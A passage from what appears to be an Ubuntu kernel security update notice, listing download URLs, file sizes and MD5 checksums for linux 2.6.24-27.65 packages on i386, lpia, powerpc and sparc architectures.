068fdde4394c7850abba6ea81e69c801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2089276 69416120cd161789b598b2b93034db07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb\n      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163034 9cc84b270528d0fef36320974b415392\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   236710 755a3caeceece8650e46706804c6e072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb\n      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   334046 06512921aae848be603af54dc56f72e6\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    62718 e53308b729496be4a0e343535769c74e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   704830 ef370acc49192e464ef553984e361d88\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   243328 b280fefee27294e988529239616e68fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   387992 53b23049b6f79a9609349927adec3443\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb\n      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   266748 d71a805e23acc800f21449d312975e04\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   201688 94056840984e621b385099d261ce2420\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    83682 bcafd92384fdae95293c310f83443303\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    22356 aa2c6396604a45f318881df2e562f625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31\n    